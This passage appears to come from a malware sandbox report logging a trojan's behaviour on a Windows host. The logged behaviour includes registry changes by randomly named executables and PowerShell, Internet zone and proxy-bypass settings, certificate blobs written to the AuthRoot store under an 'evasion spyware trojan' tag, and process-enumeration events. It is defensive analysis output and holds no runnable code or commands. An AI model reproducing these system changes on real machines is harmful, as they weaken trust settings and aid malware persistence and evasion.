Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings C:\Windows\syswow64\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CLM27.tmp\oYX2u8fIAxUTdPgJpvdjbe4R.tmp N/A
N/A N/A C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe N/A
N/A N/A C:\Users\Admin\Pictures\0YQWaRmoOozYpx6E5N1eJwqY.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
